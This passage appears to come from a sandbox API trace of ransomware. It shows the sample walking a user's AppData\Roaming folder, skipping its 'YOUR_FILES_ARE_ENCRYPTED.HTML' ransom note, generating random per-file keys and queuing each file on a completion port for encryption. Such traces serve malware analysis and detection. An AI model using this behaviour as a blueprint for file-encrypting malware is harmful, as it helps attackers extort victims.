RandomBuffer=0x19eaa8) returned 1 [0123.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ofld41b-f_fuwjogy5b.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.434] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=56078) returned 1 [0123.434] GetProcessHeap () returned 0x600000 [0123.434] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.434] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="A7") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="D0") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="E9") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="A6") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C0") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="38") returned 2 [0123.434] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="55") returned 2 [0123.434] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="BA") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="88") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="A5") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="7D") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="D1") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="C4") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="FE") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B6") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="83") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="FE") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="DF") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="BB") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="43") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="5B") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="5E") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="4E") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="7D") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="90") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A4") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="4B") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A7") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="DB") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="92") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="52") returned 2 [0123.435] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="42") returned 2 [0123.436] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\oflD41b-F_FUwjogy5B.bmp" [0123.436] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.436] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.439] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72f56530, ftCreationTime.dwHighDateTime=0x1d70501, ftLastAccessTime.dwLowDateTime=0xe9143e20, ftLastAccessTime.dwHighDateTime=0x1d707d7, ftLastWriteTime.dwLowDateTime=0xe9143e20, ftLastWriteTime.dwHighDateTime=0x1d707d7, nFileSizeHigh=0x0, nFileSizeLow=0xfdbb, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="p4zini7.gif", cAlternateFileName="")) returned 1 [0123.439] StrStrIW (lpFirst="p4zini7.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.439] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif") returned 53 [0123.439] PathFindExtensionW (pszPath="p4zini7.gif") returned=".gif" [0123.439] lstrlenW (lpString=".gif") returned 4 [0123.439] PathFindExtensionW (pszPath="p4zini7.gif") returned=".gif" [0123.439] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\p4zini7.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.440] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=64955) returned 1 [0123.440] GetProcessHeap () returned 0x600000 [0123.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.441] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="C3") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="75") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="00") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="C2") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="A3") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="AD") returned 2 [0123.441] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="4C") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="B4") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="6C") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E9") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="95") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4C") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="E9") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="8B") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="BA") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="CD") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="84") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="76") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="78") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="0D") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="C1") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="74") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="BC") returned 2 [0123.441] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="DA") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="93") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="3C") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="DB") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="77") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="5D") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="47") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="8D") returned 2 [0123.442] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="63") returned 2 [0123.442] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\p4zini7.gif" [0123.442] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.442] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.447] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3fa30a0, ftCreationTime.dwHighDateTime=0x1d70279, ftLastAccessTime.dwLowDateTime=0x6b0d12b0, ftLastAccessTime.dwHighDateTime=0x1d70343, ftLastWriteTime.dwLowDateTime=0x6b0d12b0, ftLastWriteTime.dwHighDateTime=0x1d70343, nFileSizeHigh=0x0, nFileSizeLow=0xe3d1, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="pCUPBjWg.m4a", cAlternateFileName="")) returned 1 [0123.447] StrStrIW (lpFirst="pCUPBjWg.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.447] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a") returned 54 [0123.447] PathFindExtensionW (pszPath="pCUPBjWg.m4a") returned=".m4a" [0123.447] lstrlenW (lpString=".m4a") returned 4 [0123.447] PathFindExtensionW (pszPath="pCUPBjWg.m4a") returned=".m4a" [0123.447] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\pcupbjwg.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.448] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=58321) returned 1 [0123.448] GetProcessHeap () returned 0x600000 [0123.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.450] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="30") returned 2 [0123.450] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="3F") returned 2 [0123.451] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="50") returned 2 [0123.451] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="8D") returned 2 [0123.451] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="17") returned 2 [0123.451] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="DC") returned 2 [0123.451] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="13") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="96") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="2C") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1C") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="CD") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="BB") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="C9") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="21") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="0E") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="5A") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="08") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E5") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="B0") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="8B") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="AF") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="4E") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="84") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D2") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="10") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="4F") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="DA") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="A9") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="44") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="88") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="F3") returned 2 [0123.451] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="28") returned 2 [0123.452] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\pCUPBjWg.m4a" [0123.452] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.452] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.456] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb297e8d0, ftCreationTime.dwHighDateTime=0x1d70361, ftLastAccessTime.dwLowDateTime=0xca1ee0, ftLastAccessTime.dwHighDateTime=0x1d70760, ftLastWriteTime.dwLowDateTime=0xca1ee0, ftLastWriteTime.dwHighDateTime=0x1d70760, nFileSizeHigh=0x0, nFileSizeLow=0x8509, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="po1xycLmCFdEsolA.docx", cAlternateFileName="PO1XYC~1.DOC")) returned 1 [0123.456] StrStrIW (lpFirst="po1xycLmCFdEsolA.docx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.456] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx") returned 63 [0123.456] PathFindExtensionW (pszPath="po1xycLmCFdEsolA.docx") returned=".docx" [0123.456] lstrlenW (lpString=".docx") returned 5 [0123.456] PathFindExtensionW (pszPath="po1xycLmCFdEsolA.docx") returned=".docx" [0123.456] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\po1xyclmcfdesola.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.458] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=34057) returned 1 [0123.458] GetProcessHeap () returned 0x600000 [0123.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.459] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="79") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="94") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="BB") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="6B") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="5B") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="49") returned 2 [0123.459] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="9D") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="08") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="F9") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="09") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="46") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="2C") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="5D") returned 2 [0123.459] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="BA") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="A3") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="3A") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="2C") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="E0") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="E2") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="69") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="DE") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="6B") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="3A") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D5") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="93") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="1D") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="2C") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C0") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="C8") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="1C") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="60") returned 2 [0123.460] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="49") returned 2 [0123.460] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\po1xycLmCFdEsolA.docx" [0123.460] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.461] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.467] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31a826e0, ftCreationTime.dwHighDateTime=0x1d706e5, ftLastAccessTime.dwLowDateTime=0x1e600290, ftLastAccessTime.dwHighDateTime=0x1d708f4, ftLastWriteTime.dwLowDateTime=0x1e600290, ftLastWriteTime.dwHighDateTime=0x1d708f4, nFileSizeHigh=0x0, nFileSizeLow=0xa5b2, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="RAN7.mkv", cAlternateFileName="")) returned 1 [0123.467] StrStrIW (lpFirst="RAN7.mkv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.467] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RAN7.mkv") returned 50 [0123.467] PathFindExtensionW (pszPath="RAN7.mkv") returned=".mkv" [0123.467] lstrlenW (lpString=".mkv") returned 4 [0123.467] PathFindExtensionW (pszPath="RAN7.mkv") returned=".mkv" [0123.467] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbfb32a0, ftCreationTime.dwHighDateTime=0x1d6fe54, ftLastAccessTime.dwLowDateTime=0x76f8e6f0, ftLastAccessTime.dwHighDateTime=0x1d706c0, ftLastWriteTime.dwLowDateTime=0x76f8e6f0, ftLastWriteTime.dwHighDateTime=0x1d706c0, nFileSizeHigh=0x0, nFileSizeLow=0x14fcf, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="RxeVrJMTw05vP9PNhl.bmp", cAlternateFileName="RXEVRJ~1.BMP")) returned 1 [0123.467] StrStrIW (lpFirst="RxeVrJMTw05vP9PNhl.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.468] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp") returned 64 [0123.468] PathFindExtensionW (pszPath="RxeVrJMTw05vP9PNhl.bmp") returned=".bmp" [0123.468] lstrlenW (lpString=".bmp") returned 4 [0123.468] PathFindExtensionW (pszPath="RxeVrJMTw05vP9PNhl.bmp") returned=".bmp" [0123.468] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0123.468] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\rxevrjmtw05vp9pnhl.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0123.472] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=85967) returned 1 [0123.472] GetProcessHeap () returned 0x600000 [0123.472] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.472] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="85") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="7F") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2B") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="1D") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="84") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="D4") returned 2 [0123.472] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="D6") returned 2 [0123.472] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="EA") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="97") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="0F") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="49") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="D9") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="63") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="A0") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="56") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="DC") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="9E") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="43") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="E6") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="3B") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="6B") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="42") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="1A") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="60") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="24") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="18") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="6B") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="2D") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="66") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="3D") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C7") returned 2 [0123.473] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="23") returned 2 [0123.474] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RxeVrJMTw05vP9PNhl.bmp" [0123.474] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 